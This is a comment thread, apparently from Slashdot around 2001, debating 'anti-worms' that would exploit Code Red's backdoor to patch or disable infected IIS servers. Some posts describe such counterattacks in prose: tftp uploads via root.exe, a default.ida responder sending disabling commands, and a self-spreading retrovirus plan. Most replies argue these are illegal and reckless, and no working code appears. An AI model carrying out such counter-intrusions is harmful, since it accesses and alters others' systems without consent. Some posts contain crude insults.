Last, but not least, is legal. What if all those 'anti-viruses' essentially DOS your box trying to 'fix' it? Can you sue the one who sent you the anti-virus? What if something went berserk in the code of the anti-virus (yeah, I know, software does not have bugs, but what if it happens), and wipes out your whole server, while it could be fixed fairly easily otherwise? Can you sue the creator? Probably yes. After all, the 'anti-virus' virus did not present you with a click-through license that disclaimed any liability or even gave you a choice to *not* be infected.
Just a few thoughts that came to mind. There are more. If you can think of some, post below!
Jobs? Which jobs?
Seriously, do you have any data showing that Code Red does "bog down" traffic globally?
There's never been a worm that exploited an Apache hole the way this IIS hole is being exploited. That's not flamebait; that's a fact.
It's been years since any remote vulnerability has been discovered in Apache. That's not flamebait; that's a fact.
Are you willing to make a new "nice guy" worm every time a new evil IIS worm comes out? If not, then you would only lull IIS admins into a false sense of security by fixing their problem for them this time. Let them deal with it; it's a valuable educational experience.
An article on /. came up a while ago about a worm that did just this called "Cheese Worm".
:-)
It fixed a back door created by another worm then goes looking for other systems infected by the l10n worm.
Yes, it's a novel idea. No, it's not the solution. Not everyone runs the same distro/OS and not everyone has them configured the same.
It would take an amazing amount of design and coding work to create one that intelligently fixed configuration problems without creating more nightmares for the admin, and even then, it's likely to cause more problems than it fixes. Then it would no longer be a worm - it'd be a "service pack".
Why bother.
This is NOT an "IIS" hole. That's a fact. This is an Indexing Server hole. That's a fact. Comparing this to 'apache never having an exploit like this' is wrong. That's a fact. Comparing this to some apache module or CGI script being exploited, which has happened, and will continue to happen, is accurate. That's a fact.
Vintage computer games and RPG books available. Email me if you're interested.
I was surprised when a virus got sent from someone I thought would know better. After thinking it through, it's not at all surprising.
The problem is that daily use of MSFTware trains users to click on such attachments and ignore the warnings. A Word macro should only be able to affect the document it's in. Likewise an Excel macro. Yet MSFT engineers took the lazy route and enabled unlimited powers in files that should be data, not programs.
The result is that people who exchange documents and spreadsheets via e-mail are (correctly) warned with a popup box every time they open one. They proceed anyway, because that's what they have to do. Daily habit trains them to ignore the warnings.
..why does all this remind me of the problems that Australia had with rabbits, then cats, then other animals introduced to fight the original problem plant/animals there. more Virii will slow down the net, and everyone will have to have programs installed on their computer to filter them out just to surf the net! (wait, we have this already!) but then, all these Viruses & cures remind me of the classic radar gun, radar detector loop. the people who make the guns & the detectors will be the ones who profit! so, lets see. I cut my programmming teeth by writing viruses, then, when I get really good, then I charge people to innoculate their computers. sounds like I am creating $$ out of thin air! -Kevin
> Yes, but criminal trespass (a crime to which an American citzen
> can respond with deadly force) and cracking a webserver are of the same magnitude.
Even if I agreed that criminal trespass and cracking a webserver are the same (they're not, in either a legal or ethical sense), you're way off on the justification for deadly force, at least in the laws of most U.S. jurisdictions. First, cracking a web server is like picking the lock on your front door, which is breaking and entering, not criminal trespass. Second, you're not legally allowed to use deadly force against someone unless they are threatening your life or well-being. Since someone can commit criminal trespass when you're not present, if you drilled someone just because they broke into your house while you were at work, you'd be guilty of second-degree murder. In fact, if you shoot someone who breaks into your house while you're at home, the burden of proof for threat still rests with you (basically, you get "convicted" of justifiable homicide) or you're still going up the river.
Virg
Blah blah blah --- two wrongs don't make a right --- blah blah blah
BigCat79
"The dead have risen and are voting Republican!" --Bart Simpson
The real harm from Code Red I was the amount of traffic it generated. Your white hat worm would cause the same traffic problems if not more since it wouldn't know when to stop.
THIS SPACE FOR RENT
There are two problems with an anti-worm:
1) there is an obvious, less-intrusive solution to the problem. Log the IP addresses, notify their ISP, and (assuming the ISP is on the ball) they "go dark" until they clean up their act. It's not like it's hard to verify the information provided to the ISP.
This will guarantee that 1) that system infects nobody else and 2) the owner is aware of the problem.
2) The second problem is contained in the comments above - quietly patching the system does nothing to undo the damage (it might close a few doors, but *anyone* could have run *anything* on that system while it was open) and does not teach the owner to take responsibility for their system.
However, this requires the ISP to take action. To be honest, some of these systems are starting to remind me of car alarms that run for hours (e.g., because of high winds) and the owner can't be bothered to shut them off. Breaking some glass on that car is illegal... but few cops or DAs would consider anger vented at car alarm which kept neighbors up all night a crime without a compelling mitigating factor.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
I wonder if you could fit a whole linux distro into a virus? Solve the root of the problem.
orlando.
-= This is a self-referential sig =-
It has been discussed before for other vulnerabilities as well. But the consesus is that this is a bad idea for a number of reasons, and they can be summarized as:
- Liability: Most viruses and worms cause problems because they're wrtten poorly. If the "anti-worm" doesn't behave as expected on all systems, and causes damage, the person who wrote it could be liable.
- Legality: Even though it's well intentioned, it's still legally the same criminal act as the original virus/worm writer commited. If the worm does harm (by breaking somebody's app) then there will likely be criminal as well as civil charges filed.
- Morality: Fundamentally, this isn't the way the white hats behave. We, as a community should help others fix the problems, but shouldn't be using the techniques of the black-hats to do it... including exploiting security holes and mucking with other people's machines.
It's certainlly a tempting idea, especially for thorny problems like CR, and CRII, but it's also a real minefield.I've got an even better solution that will insure these viruses stop spreading. We create a virus that exploits the CODE RED back door and "patches" NT by installing linux over it. The ultimate security patch! ;)
"Question with boldness even the existence of a god." - Thomas Jefferson
This is almost the same thing I said in my post. You wouldn't want it to propagate via the worm technique though... it must remain strictly confined to the intended network (otherwise you might fix potential clients.) On a side note, I wouldn't be surprised if the virus writer(s?) worked for a company that offers this type of service. Look at eEye: they found the vulnerability, got credit from Microsoft, and make money with vulnerability assessment services. Corporate ethics: Make it hard to tell the good guys from the bad.
Live wrong, impostor.
A major security hole was discovered in Red Hat 7.?? (Don't remember the details). Soon after mysteriously a virus appeared on the web which fixed bug.
The Max Vision of whitehats.org found himself in trouble for writing a worm which patched systems for the BIND hole.
Read more about it at http://www.securityfocus.com/news/203
Yeah, by making a friendly virus, you're closing the back doors, but who cares really? A friendly virus would be *just* as damaging bandwidth wise, would it not? So, you'd be adding another damn virus to the mix, eating up more and more bandwidth... do the world a favor, and DON'T try to do this.
If the OSS community could do something like this it might boost their image, but I'm afraid it might only go to promote the connection of OS with black hats/Piracy/virii etc.
From a practical viewpoint anti-code red will be treated like DeCss, not in itself evil, but it could be used for evil (DMCA aside, which declares it completely evil (I love the government)). A "virus" is a "virus" to most people, and you can bet dolars to doughnuts (KrispyKreme of course) that no news agency will be quick to use the term "anti-virus" or "vaccine"
And on another level, it might be a nice object lesson for the people running MS servers that it might be time to try to maybe tighten up some of the massive security holes in their networks. I dunno, stuff like Code Red and SirCam (Someone sent circam to my CsMajors mailing list at school) only go to prove that most people do not devote most of their mental cycles to what they are doing while at the computer
Comments should be like skirts. Short enough to keep your attention, but long enough to cover the subject
Anyone who uses a script like that is crazy. Next there will be a Code Red III which spoofs the originating IP and then your perl script becomes an unwitting part of a distributed DOS attack... Then YOU go to jail instead of the Code Red author.
Ohmy, how fscking stupid is it possible to be. Let me give you the hints one by one.
To attack a webserver you need to use http..
http uses tcp
tcp has something called initial sequence numbers
initial sequence numbers have been randomized rather good in more "recent" (think 97->now) operating systems.
spoofing a connection via tcp is almost impossible.
"Rune Kristian Viken" - http://www.nwo.no - arca
Are you unaware that firefighters often do use fire to fight fire?
(They burn away strips of forest to prevent a forest fire from being able to cross the strips and attack, say, neighborhoods.)
I think your comment in the next paragraph is right, though, because it illustrates the weakness of the forest-fire analogy.
In particular, while fighting viruses on the Internet today might be more like fighting a forest fire -- in that the trees are not "smart" at fighting fires, you want to save as many as reasonably possible, yet you're not averse to burning a few more down yourself to avert a larger disaster -- the overall goal should be to convince Internet sysadmins to do for their systems what homeowners and business owners have, over the centuries been encouraged to do: be the first line of defense against fires starting, or offense against fires spreading, etc.
(Think of elements of "progress" here -- new homes likely have smoke alarms, people are strongly encouraged to report fires quickly, flammable materials are less widely used, buildings are designed for quick exit in the event of fire.)
Until the Internet resembles something more like today's upscale suburban neighborhood (in its security against fires) than a dry, dense forest, I suggest that fighting fire with fire does have utility, if thoughtfully (rather than arbitrarily) applied by experts.
Practice random senselessness and act kind of beautiful.
...though it's not quite as effective.
Since the start of this week, I've been running a Perl script as an hourly cron job that parses my firewall logs, gets the originating IP addresses of any Code Red scans, does a reverse lookup, attempts to extract a meaningful domain name and then mails a polite notification to postmaster and webmaster at that domain. The notification contains a link to the MS page with the details of the relevant patches.
Since doing so, I've had a number of responses from people thanking me for pointing out the problem and confirming that their server has now been patched. The response rate is only about 1%, largely due to the fact that around 90% of the problem servers are on dial-ups/cable modems/DSL, but it's better than nothing.
I'm not advocating that everybody, or even a large number of people, do this, as the amount of traffic it would generate would only add to the problem, but it seems like a more legal solution than another, white-hatted, worm.
I would be a paid subscriber if Taco and Hemos weren't such cunts
The Electronic Communications Privacy Act and the Computer Fraud and Abuse Act combine with state "Blue Sky" computer crime and fraud law to make this tactic amazingly dangerous for anybody who does this. G-d forbid the license should (accidentally or otherwise) harm any system in any way in so doing -- the damages and liability could be enormous, and there may well be substantial criminal responsibility as well.
In short, anybody who even begins to perform a passive security audit of a system of another without having obtained written consent TO DO EVERYTHING THAT WAS DONE (exceeding authority can be a crime as well as obtaining authority in some cases) risks the slings and arrows of abusive attorneys.
It would be nice to have a vigilante virus out there -- the guy who wrote it might even become some kind of folk hero. Even so, he might spend years in jail for his good deeds, and g-d save him if he messed up.
Also affected are Cisco 678's.
i rus.html
See http://www.qwest.com/dsl/customerservice/coderedv
The virus nVIR A was propagating the macintosh world.(1990) Someone created a second nVIR B to counter attack the nVIR A, to replace A with itself.
:-(
There were bugs into nVIR B, making the computer part unusable. and the nVIR B could propagate on a computer which wasn't infected by nVIR A.
Not everybody was happy
bye
What about something like this?
.ida extension parseable by php.
Put in you apache home directory a new default.ida archive with this lines:
Now make
Been there, done that. The Cheese worm for Linux does basiclly the same sort of thing.
Still it's a bad idea. For legal reasons: unauthorized is unauthorized even with good intent. For complexity reasons: the worm/ virus may break something else or have unintended conquences like the Robert Moore Jr. worm in the 1980s. Common sense: Encouraging bad system admin habits, that is to be lazy, is a very bad idea. Think of a silly analogy: like breaking in to fix a faulty burgary alarm is a bad idea.
I'd say a stranger in my house DOES pose a threat to my family. I don't know who this creep is, or what he intends. If my family is at stake you'd better believe I'm going to play safe. I might not shoot the instant I see him, but I'd sure take aim and if he tried to flinch without my permission he's history.
"I object to doing things that computers can do." -- Olin Shivers, lispers.org
Perhaps system administrators have other things to do other than keep applying patch after patch to the rubber dinghy Microsoft built as a web server. As long as we have good backups, why bother until something goes wrong? It's a waste of attention to keep patching things, not to mention the odd service pack disasters that make things worse than before.
Don't go blaming the system administrators who have better things to do, put the blame right where it belongs, in the developers lap. They should test their code, and not count on us as their test lab.
--Mike--
And I'd say that basically nothing bad will happen to me; I'd just get a couple hundred hosts a day knocking on my door and not getting in.
But what if you were an @home customer? Then you'd say, "well, I'd be pretty much fucked and could get 1/10 the normal bandwidth from my broadband.". I don't know Tim, but he might say, "you fucking idiot, why are you with @home?".
It's funny but I did this as part of a science fair project in early 1997. It made it to the Canada-Wide Science Fair that year and I even won a couple of awards for it. Admittedly virii were very different in 97. My system only dealt with non-resident .com and .exe attacks, but it still worked.
every july 4 at the retirement center they play the movie independence day some of the people don't like it but i thought it was good but even though it wasn't very patriotic. people always tell me to watch out and not catch computer viruses and i always think about that movie because they used a good virus if it was good enough for them i guess it would work. i really liked the black man in that movie normally they scare me but he seemed like a nice young man even though his wife was a tramp. lois' husband ran off with a woman like that but that was years ago and she died of heart failure a couple years back
sean says i have to get off the computer now so he will send this for me goodbye your friend gladys malone
Thats a great idea! The only way to get incompetent sysadmins to fix this would be to do it for them, right? Since they obviously aren't doing it themselves. I doubt it would even be that difficult to write! Perhaps you could write other viruses which patch vulnerable machines as well!
"Question with boldness even the existence of a god." - Thomas Jefferson
I'd pay good money for a script that would somehow protect HP printers from infection, or at least create a temporary firewall of addresses infecting them.
This is the quiet side of the issue, because the printers can't infect other sites. But a printer also can't be power cycled remotely (except if you've somehow forseen this problem). The printers are also unlikely to be patched, so their security holes will exist long after this current worm is done sucking bandwidth. And I really hate walking across lab, up 3 flights of stairs, to restart the printer.
skye
Yup, the Internet, *BSD, fair use, freedom, and even Slashdot. Why go on living?
Yeah I wrote something - its a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.
I've developed a script - though its not fully functioning yet outside my test environment - that will detect a code red attack and immediately strike back by using root.exe to upload serveral files using tftp.
These files are used in an attempt to automatically patch the server and remove the security holes left by code red.
Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of with work in my internal network between different machines) - but I cant quite get them to work on the machines on the web.
It may because of the increased security of NTFS. As my routines are only designed to work with security lax FAT formatted systems - that be part of it.
Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop.... and I do not believe it will until somebody writes a worm like code red that patches the servers instead of opening them up.
Note: I posted this one YESTERDAY in the CODE REDUX and you damn moderators wouldnt even give me one damn point. Idiots. I wonder if my karma can slip below -5?
I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
We really just need to publicize that it's Microsoft that got us into this mess. Microsoft can and should be cast in a negative light for their slipshod dedication to security. I mean, they knew about the hole they have had lots of major security holes in IIS. They do not have the appropriate attitude about security. They want to maximize profit by not spending developer resource on fixing things and pubs resource on getting the fixes out. In that sense, they are trading the profits and losses of companies using their product, for their own financial gain. (Monopoly behavior?)
So I say let IT keep fighting the worm and let's help them cry louder and longer about Microsoft to the media and their business executives. With any luck IIS will be tried, convicted and sentenced to death in the court of public opinion and we'll have one less security nightmare.
The root of the problem is not the OS (or lack of it ... hehe). The problem is clueless admins. I am at a loss as to just how FUCKING CLUELESS one has to be...forget security mailing lists, forget vendor announcements...this virus has been in the mainstream media for weeks. Anybody who is still vulnerable to this bug should IMNSHO be "Disbarred" from systems administration forever.
Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
at a cost of $300 per house.
There are a lot of good legal resources out there, both internet law libraries, the supreme court web site, and actual "meatspace" libraries. If people would just do a little research before posting, we would have a lot fewer "it seems to me that" posts and a lot more informative "if we apply the ruling in blank V blank" posts. I can dream, can't I?
I'm the stranger...posting to
I've seen this asked many places already. The long and the short of it is that this tactic is ILLEGAL. You'd be subject to the same punishment as the Code Red authors. Yes, your intentions are good, but you're A) accessing a computer system without consent and B) INSTALLING software without consent. This is no different than me walking into your house at 3 AM to install the IIS patch on your server. It doesn't matter that I had good intentions, I'd be at gun point pretty quick. I'd be charged with unauthorized entry regardless... you didn't invite me, I came in, and refused to leave when you told me to because "the patch wasn't finished upgrading".
There is no reasonable defense against an idiot with an agenda
:wq
I know many linux guys have some type of email server running at home. How about on IIS? Would it do any good to send emails to postmaster@xxx.xxx.xxx.cablemodem.com or root@xxx.xxx.xx.cablemodem.com ?
http://www.windmeadow.com/
In a sense, "white hats" are merely Good Samaritans themselves. Perhaps new laws should be passed to cover the actions of Good Samaritans whose intent is to help others online.
--It's Pimptastic!--
I believe that the United States FBI
I know there are 'computer intrusion laws' in the United States. However, this kind of thing is in an ever so slightly grey area, and the FBI (I believe) has stated before it is still an unauthorized intrusion.
Wish I had a link to give you guys. Oh well.
Do you like German cars?
We seem to be forgetting the fact that a similar "inoculant" was released once to repair a similar problem. The guy that released it was jailed, not because he released a "repair" type virus, but because the repair worm left a back door for him on the people's server....If the worm in question had NOT installed a back door, but had simply installed a fix and then looked for more code red servers before erasing itself, would that be legal? Interesting question.
Guees that means if my machine gets hacked here I have to give it over to whomever hacked it.
I'm the big fish in the big pond bitch.
I can tell you what'll happen; your wardrobe the next day will be an orange jumpsuit and shower shoes.
Lawyers are licensed by a state after passing the Bar. However, some state's Bar's are accepted by other'. Basically you'd need a Lawyer from CA or NY. So no, you would not need even 50.
Furthermore, software liablilty cases are almost always handled at the state level, never below. Counties generally regulate stuff like building codes, water rights. Cities handle crap like parking meter regulations (REALLY interesting crap). It would be interesting to see San Francisco or (more liekly) Alameda County put a ban on Windoze or IIS...
http://www.dictionary.com/cgi-bin/dict.pl?term=Vir us
READ: The plural of Virus is VIRUSES NOT VIRII.
REPEAT READ: The plural of Virus is VIRUSES NOT VIRII.
PASS ALONG: The plural of Virus is VIRUSES NOT VIRII.
I mentioned this yesterday and some ASS HOLE Called me "REDUNDANT REDUNDANT REDUNDANT". Said I should loose Karma. Use whatever it takes!
Actually, there's nothing like a challenge to a virus writer .. so I'll bet if you started spreading a good one, you'd just start escalating the war. Sometimes I believe viruses havn't caused major catastrophes yet because we dont fight viruses with viruses. Think of guns .. since we fight guns with guns, it really ends up coming down to who has the most/biggest guns. Do we really want to find out who has the most time and haxoring genius, the black hats or the white hats?
"Old man yells at systemd"
Of course, you're ignoring the fact that sometimes people need to be killed. For example, if someone enters my home at night without my permission, according to the law I can use deadly force to stop them. And I will. Say hello to Mr. 9mm!
'nuff said.
"i was saying gnu-rd"
Anyone who uses a script like that is crazy. Next there will be a Code Red III which spoofs the originating IP and then your perl script becomes an unwitting part of a distributed DOS attack... Then YOU go to jail instead of the Code Red author.
(I am Slashdot's official lawyer)
This space left intentionally blank.
Just fire whoever is neglecting their servers.
But a lot of it boils down to the typical mentality of the admins.
Typical NT admin: "If their not a member of the admin group.. Then we're safe."
Typical Unix admin: "We're never safe, but we try our hardest every day."
who really cares? i mean, if people keep producing virii/worms and others are make ones that fight them then the this is bound to be a big mess.
and if it takes a big mess for people to a) get a clue and b) fix their fscking security problems, then maybe this wouldent be such a big problem ever.
sometimes the best way to take care of a fire is to let it burn its self out.
i cant seem to come up with a sig.
Well, if it gets so damn annoying - THEN INSTALL THE FUCKING PATCH! No more viri, no more anti-gen. Or hell, just unplug your blooming network card. (The you'll just have to monitor the airwaves for rouge Bluetooth or WIP messages...)
Well, that's not exactly right either. Remember, you're talking about laws dealing with *physical* force, not retaliatory/defensive computer intrusions.
Your scenario would be: Adam breaks into my server, so I go over and shoot Adam, or break his mousing arm with a baseball bat.
Compare: Adam breaks into my server and steals confidential data. I trace the attack back to Adam, infiltrate his workstation, and perform a destructive format of all of his hard drives.
IMHO, this latter form of "self help" is more of a grey area, legally. However, it may have negative practical consequences. (Piss off a black-hat subculture and risk annoying attacks from all quarters -- c.f. middle-east style escalation.)
IMO, an anti-worm worm is possibly illegal, and could lead to lots of civil liability if a bug is present in the code that trashes a server somewhere and they find out you released the anti-worm.
IANAL but....
There is really no single law that covers this so a lawyer would be useless in this case. You could get ten different opinions from five different lawyers and any or all of them could be right. Or wrong. That's what Judges do.
Now, with the PHP or CGI programs that do something to a computer, it would be a very grey area. After all, the 'attacking' computer is actualy requesting information from your machine. You are simply returning information. Then you can get into the motive of the requestor and the motive of the author and it gets even worse.
Basically, all a lawyer is going to tell you is his theory of how a set of laws will be interpretted. Only Judges can actualy do the interpretting.
Viv
Gmail invites for ip
> Colorado (for positive) and many other states have a "make my day" law.
This doesn't contradict my original statement. Note that my example describes a breakin when the homeowner isn't home (the MMD law doesn't apply) and that when he/she is, that the burden of proof for threat rests with the homeowner (MMD laws relax that burden considerably, but they do not remove it).
Virg
If these worms are illegal because they gain unauthorised entry then of course making a 'friendly' virus is illegal because it is doing the same thing.
Having good intentions is nice but consider this (fictional) scenario: A local cat keeps trying to have 'relations' with my cat and I dont know who the owner is, plus the owner is unaware of their cat's activity. I catch the cat and get it 'fixed' without the owner knowing. When the owner finds out I doubt they or the police would be too pleased about it. Swap 'cat' for 'web server' and you have this code red situation.
Yes the internet is unpoliced but I dont think the 'Do-Gooder' virus is a very good answer. Internet policing is an interesting new subject but traditional security ideas still apply - the owner of the house is the one responsible for making sure the door is locked. People need to be taught this applies to the internet too.
(And no jokes about unauthorised entries thank you very much)
What makes this different from the FIRST code red worm? You want to create something that is just as infectuous. However much bandwidth Code Red 1 chewed, this would chew just as much. Granted, code red didn't take up all that much, but we have to think of ALL of the consequences of releasing a worm just because WE think it is a good idea.
Why yes, part of my morality system is "don't get sued." It comes from the part that says "don't bounce your checks" and "don't get your house foreclosed on."
Actually, I really and truly did ask my lawyer something similar to that, in a systems support sense.
His reply amounted to this, which is blah blah not legal advice don't listen to me disclaimer yadda yadda. There are circumstances where you have a duty to say or do something. Those cases are usually pretty obvious, such as when your client, to whom you have a duty because you're their rented admin, is about to lose important data. Or when you find a stranger lying in the street. Or when you find a lost child and nobody else is around to help. Etc., etc.
In those cases you may be liable if you don't react in a responsible way.
Observing a Code Red infestation isn't one of those cases. If you just put up your shields you've done enough. If you choose to send a short, polite email to affected sites, that is probably a good thing. A phone call might be even better.
But that's another angle, similar to how self-defense is applied. If you can defend your network adequately by proper configuration and perhaps notifying or firewalling away the attacking sites, then your claim to "self-defense" (which is really not called self-defense in a legal context, more like "abatement of a nuisance" or "mitigating losses") becomes much, much weaker.
Yet again, I'm not a lawyer, this is not legal advice, don't listen to me if this is important to you, this is all just for discussion. But long story short, the stranger lying injured in the street creates a duty on your part in many circumstances. Stranger with Code Red infestation probably does not create a duty, only a liability risk if you take it upon yourself to "fix" it.
I think people are proposing and talking about two different solutions here: 1. Have another anti-Code Red worm, where code is uploaded to an infected machine, and then the previously infected machine then runs the anti-Code Red worm too, and then actively scans for more infected hosts to pass the 'cure' on to. IMHO, this is probably a bad idea. 2. Make a script on a webserver named default.ida that sends the appropriate commands to the backdoor on CR2 infected machines to download and install the patch. The script merely waits for connections to the webserver it's on, and doesn't propogate itself to other machines. IANAL, but to me, this would seem to be on better (but not necessarily solid) legal ground, as you were merely responding to a request the infected machine sent you, instead of actively searching for infected machines, and uploading yet another worm to them.
What if instead of releasing a virus, you made a program which waited for probes from infected machines and responded to those probes by exploiting the hole to close the hole?
B:Don't get caught.
C:It's not breaking and entering if the door is standing wide open.
You'll find plenty of cases where a criminal harmed by a victim who was protecting himself has successfully sued for damages.
Which is an excellent justification for killing him, rather than just hurting him.
In this article he wrote for ZDnet, Bruce Schneier (of counterpane.com and author of applied cryptography and countless security whitepapers) has talked about this in good detail here: ZDNet Article.
Large print giveth, and the small print taketh away
Yeah, but you missed the point. Sure it's probably kosher to defend yourself against a stranger who's broken into your house by attacking him. What would not be kosher is to go to his house, break in, and throw away his coffee.
States are not allowed to make laws that contradict the constitution. Not even the US supreme court is allowed to. Under the constitution, you as a US citizen are allowed to bare arms, meaning getting a concealed weapons permit is also null and void. If someone breaks into your house you can shoot them and have the US constitution back you up, but it still won't help you until a really high appeal ;-)
There's so many people who don't care about their constitutional rights getting blatently stolen from them.
Fun with guns is unnecessary. Guns kill people and should be banned no matter how "fun" they are.
Instead of having this counter-virus/worm attack the computer, have each computer (possibly as part of an anti-virus package, or windows itself (or installed with every linux distro)) contain a framework which allowed limited access to a computer by counter-viruses/worms voluntarily, and with safeguards to prevent abuse and overuse of bandwidth/resources etc..
Of course, there would be problems getting everyone to install the agent host, but if such an idea became accepted, then each counter-virus would run in a sandbox and be prevented from doing harm (set by the user).
Instead of releasing such a virus, what about just running it on your own machine(s)? Everytime your machine gets probed and attempts to infect, it just turns around and does the same thing to the orginating machine. That way you are not doing anything that wasn't done to you, and you are patching a known infected machine, not clean ones.
I wouldn't think they would have a good case for you intruding/hacking since they did it to you first. Just keep the logs of the event to CYA.
Think again. It would be nice if that's the way the world worked but it doesn't. Legaly you can't tamper with a network or system without the ownwers permission. No matter how benevolant the creater the companies lawyers will go after you no matter how honest your intentions are. You messed with our systems and it's off to court you go. There have been a few court cases regarding this all ready. The one I rember was in Nevada (i think) where an IT person fixed something on a clients computer that was out of scope to his work there. The client company sued and won.
There are also lots of "cease and dissist letter" stories from anyone trying to be helpfull and informing companies of holes in there networks.
http://www.pbs.org/cringely/pulpit/pulpit20010730. html
Bob Cringely has already discussed this, and said that the government decided not to do this, because it made them seem too much like the bad guys. However, an enterprising, altruistic computer programmer might be able to do what the feds were afraid to do. And even if a mistake is made and a second "red alert" worm is created, big deal! 2 won't do any more damage than just the 1.
My cable modem is currently blinking furiously as infected "Code Red" hosts scan it. Being constantly scanned by hosts infected with a "good" worm would definitely not be an improvement. What I'd like to see, if ISP's scanning their customers machines for known vulnerabilities and then sending the customer an E-mail with fix (patch) info. A periodic scan from an ISP would be useful, a DoS attack from a "good" worm is not.
[Insert pithy quote here]
I can feel the flames licking my toes as I write this. Virus is a Latin word, the plural of which is viruses. I know virii seems to be the word of choice among most geeks, but I had to get this off my chest. The biological word uses the correct terminology, why can't we?
ubi dubium ibi libertas.
Um..no. The critical point here is that the gun is brandished. You have a right to disarm or attack someone actively pointing a gun at you, not one who merely owns a gun that could be potentially pointed at you. This applies to the code red situation if a 'self-defense' patch is applied to a computer that scans yours for the vulnerability as opposed to searching for any computer running the virus and applying the patch to it.
Instead of having vigilanties take the initiative to fight back against Internet Worms, it might be handy to have an international agency who's charge is to take care of these things. For an analogy, consider a fireman. They don't ask politely about breaking down the door and dousing a place in water. If it's on fire and presents a clear and present danger to it's neighbors, then they take care of it. Same with an infected computer on the Internet.
Supply programs that do this for all the latest viruses to the IT departments of companies with bad/lazy/not enough sysadmins. Charge them a yearly fee, and just email them a new worm that will go through their network and close all the holes behind itself once a week. Have a client that they can put on their firewall to keep it from escaping to external networks (Or just program it to stay on on local networks.).
There are companies out there that might actually pay for this.
I remember around 1988 to 90 when I first researched computer viruses they talked about benevolant uses of viruses. Some software companies where looking into using vurises to patch programs and pass on software upgrades without the user having to do anything. It didn't get any further than that if I remember.
...is when is someone going to write a virus called "Windows is insecure", so that the media can't try to sluff it off as a general security problem of the Internet :-)
Create a scriptalias on your web server, so that fetches of "default.ida" go to a CGI which responds, very slowly -- just under code red's timeout -- with whatever code red is looking for a the response of a successful penetration.
I know it creates a lot of threads, but assuming it will tolerate a decent timeout, enough of these would slow it down quite a bit, until it dies from people installing fixes.
Anybody taken apart the virus to know what timeout to use and what response it's looking for?
Has it been over a year since you last donated to the Electronic Frontier Foundation
with reading all your "This is illegal" non-sense.
First, if you did write a benificial cure to this virus, many would thank you in return.
Secondly, Where is the creator of the original virus? And how can I thank him in return? Does anyone have his E-Mail Address? No? Point taken.
In conclusion: Nobody knows who first spread this virus, so if you spread a purely good virus that patched IIS, restarted the service, and made sure it was not break-in-able to any known Issues, the public would worship this super hero, and as long as the super hero did not take off his mask to unvail his true face (being offered money from companys, gloating rights) He would be safe.
I'm a big retard who forgot to log out of Slashdot on Mike's computer! LOOK AT ME.
Its illegal. A lot of the 'damage' done by code red is not direct anyhow. A friendly worm would cause just as many headaches. It would still crash cisco 600 routers, break web proxies, clutter up logs and waste bandwidth. Its fighting fire with fire, the friendly worm would be just as much of a problem as the unfriendly one. The last guy that did it got arrested.
You also have to consider the implications of rebooting a computer with an unknown function.
Jut write a white hat worm that goes in through the trapdoor and overwrites the OS with your favorite version of linux.
No more virus problem, right, zealots?
How sleepless is the egg, knowing that which throws the stone forsees the bone.
The worm goes after 'default.ida' as I can see. They're trying to execute a program on my system. (default.ida). If my default.ida was actually a script that sent a payload back, and that payload just HAPPENED to be commands to disable their system, what's the harm there? I'm not ACTIVELY exploiting their system. I'm only sending a payload back in response to a request that THEIR system requested. Seems pretty clear cut to me.
Code red backdoor checker
creation science book
*breaths deeply*
So one intrusion is better than the other, I'd take the French over the British? (vice versa, ad naseum ad infinit ?)
We would need hundreds. 50 wouldn't even cover the U.S. given all the jurisdictions. (Federal, State, County)
If you don't want to repeat the past, stop living in it.
This is why I live in Pennsylvania...
Seriously: Check out the crime stats... It's interesting to correlate when gun legislature is passed with the migration patterns of our criminal elements..
Does anybody else know of this? Bastards
The danger is the bandwidth. The damn virus eats our entire FW CPU because it's being inspected by Code Red from Japan, US and a couple of other countries at the same time. If you would do an antivirus with the same method you would cause the same amount of bandwidth, atleast the first week or so. I told my IT chief about that and he did agree in the end but the idea is good though.
Why stop there? Why not sue gun makers cause they make something that is only good for killing people? Oh wait, a bunch of idiots already tried to pull that shit and lost.
Guns have a lot of benign uses. Ever shot clay pigeons? Ever shoot cans off a fencepost? It's fun!
IIS, however, has no such benign uses.
Fire and Meat. Yummy.
I don't understand what people are talking about with an increase in bandwidth usage by more worms. More worms does not have to mean more bandwidth used up! Here is a simple layout for an algorithm that would reduce the bandwidth taken up by either code red (sorry i don't know how to program the virus myself, otherwise i would) /. could all do it. I mean, a couple hundred. What is uncle sam gunna do, jail a few hundred people for fixing our own infrastructure? If no one goes out and makes it very obvious that they did it, then is the FBI going to go out of their way to catch you?
1. Make the retrovirus
A counter-infected machine should first patch itself and fix the effects of the code red II virus. Then it should kill all code red infections found on the machine. Then the virus should scan other computers randomly for 24 hours, and then remove itself from the computer.
Why does this reduce the bandwidth? Because the counter infected machine almost certainly has the virus if the retrovirus can come in. Then the retrovirus kills the regular virus, and takes the bandwidth that the old code red was using as its own. Thus there is no increase in usage. But OTOH many machines are infected many times, so it would almost certainly reduce the worm bandwidth usage. Also, a machine that has been counterinfected cannot be counterinfected again, so there is no risk of multiple infections on a counter-infected machine. (BTW one might want to add in that any server that probes the infected machine should also be counter-infected. make the probes from the retrovirus and regular virus look different. then again this is just getting fancy and doesn't need to be added)
And lets not forget the infection rate. You can expect it to be less than the code red because it cannot have multiple infections on the same machine, but even then it should get hundreds of thousands of machines in a few weeks, certainly. And if these machines are all patched, and after 24 hours the countervirus stops operating on a new machine, then you would have drastic bandwidth reduction. So what do we have?
First: the bandwidth usage of a counter infected machine is the same or less than that machine infected.
Second: the bandwidth is less after the machine is 'clean'
there will be a few machines that are 'innocent bystanders' which will add slightly to the overall bandwidth, but that will most likely not be significant (i have no idea how to calculate this, but i am going on the assumption that the CR virus is already on 95% of machines that it can get on. More than 5% of machines cross-infected is not such a leap of faith, especially when considering the code red 2 virus could be considered a cross infection! By msnbc's stats at least 1/3 of machines infected by CR1 are infected by CR2)
Finally: initial spread
You could simply set up a script that would counterinfect a machine if it probed you. Set that up on some regularly probed servers, and once the probes stop your job is done.
The ONLY issue is the "taking the law into your own hands"
